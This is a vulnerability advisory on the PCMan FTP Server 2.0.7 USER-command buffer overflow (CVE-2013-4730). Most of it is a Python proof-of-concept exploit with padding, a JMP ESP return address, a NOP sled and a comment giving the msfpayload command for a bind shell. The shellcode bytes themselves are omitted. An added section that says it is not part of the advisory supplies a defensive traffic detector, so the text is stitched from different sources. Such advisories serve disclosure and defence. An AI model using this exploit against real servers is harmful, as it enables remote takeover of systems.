PCMan's FTP Server 2.0.7 Buffer Overflow Vulnerability


Affected Systems:
PCMan FTP Server 2.0.7
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65289,65299
CVE (CAN) ID: CVE-2013-4730
 
PCMan's FTP Server is a simple and easy-to-use basic FTP Server.
 
PCMan's FTP Server 2.0.7 contains a buffer overflow: the arguments of the USER, PASS, STOR, ABOR, and CWD commands are not properly length-checked before being copied, so a specially crafted command lets a remote attacker overflow the buffer, causing a denial of service or arbitrary code execution.
 
Source: Jacob Holcomb

Link: http://osvdb.org/show/osvdb/94624

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
#!/usr/bin/env python

import signal
from time import sleep
from socket import *
from sys import exit, exc_info

#
# Title ************************ PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
# Discovered and Reported ***** June 2013
# Discovered/Exploited By ***** Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory ************* http://infosec42.blogspot.com/
# Software ********************* PCMan FTP Server v2.0.7 (Listens on TCP/21)
# Tested Commands ************** USER (Other commands were not tested and may be vulnerable)
# CVE ************************** PCMan FTP Server v2.0.7 Buffer Overflow: Pending
#


def sigHandle(signum, frm):  # Signal handler for ctrl+c: clean up and exit
    print("\n[!] Cleaning up the exploit... [!]\n")
    sleep(1)
    exit(0)


def targServer():
    # Keep prompting until the input parses as a dotted-quad IPv4 address
    while True:
        try:
            server = inet_aton(input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n> "))
            server = inet_ntoa(server)
            break
        except (OSError, ValueError):
            print("\n[!] Error: Please enter a valid IPv4 address. [!]\n")
            sleep(1)
            continue

    return server


def main():
    print("""\n[*] Title ************************* PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
[*] Discovered and Reported ***** June 2013
[*] Discovered/Exploited By ****** Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
[*] Exploit/Advisory ************** http://infosec42.blogspot.com/
[*] Software ********************* PCMan FTP Server v2.0.7 (Listens on TCP/21)
[*] Tested Commands ************** USER (Other commands were not tested and may be vulnerable)
[*] CVE ************************* PCMan FTP Server v2.0.7 Buffer Overflow: Pending""")
    signal.signal(signal.SIGINT, sigHandle)  # Setting signal handler for ctrl+c
    victim = targServer()
    port = int(21)
    cmd = b"USER "  # Vulnerable command
    junk = b"\x42" * 2004  # Padding up to the saved return address
    # KERNEL32.dll 7CA58265 - JMP ESP
    ret = b"\x65\x82\xA5\x7C"
    nop = b"\x90" * 50

    # 348 Bytes Bind Shell Port TCP/4444
    # msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R |
    # msfencode -e x86/shikata_ga_nai -c 1 -b "\x0d\x0a\x00\xf1" R
    shellcode = b""  # The encoded payload bytes are omitted from this listing
    sploit = cmd + junk + ret + nop + shellcode
    # Pad the request to a fixed total length and terminate the FTP command line
    sploit += b"\x42" * (2992 - len(nop + shellcode)) + b"\r\n"

    try:
        print("\n[*] Creating network socket.")
        net_sock = socket(AF_INET, SOCK_STREAM)
    except Exception:
        print("\n[!] There was an error creating the network socket. [!]\n%s\n" % (exc_info(),))
        sleep(1)
        exit(0)

    try:
        print("[*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port))
        net_sock.connect((victim, port))
    except Exception:
        print("\n[!] There was an error connecting to %s. [!]\n%s\n" % (victim, exc_info()))
        sleep(1)
        exit(0)

    try:
        print("""[*] Attempting to exploit the ftp USER command.
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit)))
        net_sock.send(sploit)
        sleep(1)
    except Exception:
        print("\n[!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!]\n%s\n" % (victim, exc_info()))
        sleep(1)
        exit(0)

    try:
        print("""[*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl+c repeatedly to force exploit cleanup.\n""")
        net_sock.close()
    except Exception:
        print("\n[!] There was an error closing the network socket. [!]\n%s\n" % (exc_info(),))
        sleep(1)
        exit(0)


if __name__ == "__main__":
    main()
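As an added defensive example, not part of the advisory or of the PoC above, the following Python inspects a client-to-server FTP control stream for the shape this overflow depends on: one of the listed verbs carrying an argument that is kilobytes long, contains non-printable bytes, or contains a run of 0x90 (x86 NOP) bytes. The length threshold, the sample traffic and the function names are assumptions of mine.

```python
import re
from typing import Dict, List

# Verbs the advisory names as reachable by oversized input.
VULNERABLE_VERBS = {b"USER", b"PASS", b"STOR", b"ABOR", b"CWD"}

# Assumed threshold: legitimate FTP arguments are short; anything past
# this is treated as suspicious regardless of verb.
MAX_ARG_LEN = 512
NOP_RUN = re.compile(rb"\x90{8,}")


def inspect_ftp_stream(data: bytes) -> List[Dict[str, object]]:
    """Split a client->server FTP control stream into CRLF-terminated
    commands and return one finding per command that looks like an
    overflow attempt."""
    findings = []
    for line in data.split(b"\r\n"):
        if not line:
            continue
        verb, _, arg = line.partition(b" ")
        verb = verb.upper()
        reasons = []
        if len(arg) > MAX_ARG_LEN:
            reasons.append("argument length %d exceeds %d" % (len(arg), MAX_ARG_LEN))
        if NOP_RUN.search(arg):
            reasons.append("NOP sled (0x90 run) in argument")
        if any(b >= 0x80 or (b < 0x20 and b != 0x09) for b in arg):
            reasons.append("non-printable bytes in argument")
        if reasons:
            findings.append({
                "verb": verb.decode("ascii", "replace"),
                "known_vulnerable": verb in VULNERABLE_VERBS,
                "arg_len": len(arg),
                "reasons": reasons,
            })
    return findings


# Constructed sample traffic (not a capture from the advisory): a benign
# login followed by an oversized USER argument padded with a NOP run.
BENIGN = b"USER alice\r\nPASS s3cret\r\nCWD /pub\r\nQUIT\r\n"
SUSPICIOUS = b"USER " + b"A" * 2100 + b"\x90" * 16 + b"\r\nPASS x\r\n"

if __name__ == "__main__":
    for finding in inspect_ftp_stream(BENIGN + SUSPICIOUS):
        print(finding)
```

The same check can be run over the reassembled TCP/21 stream from a capture, or inside an IDS preprocessor, to alert before the server process is reached.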

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
PCMan
-----
The vendor currently provides no patch or upgrade. Users of this software should watch the vendor's homepage for a fixed release:
 
https://files.secureserver.net/1sMltFOsytirTG
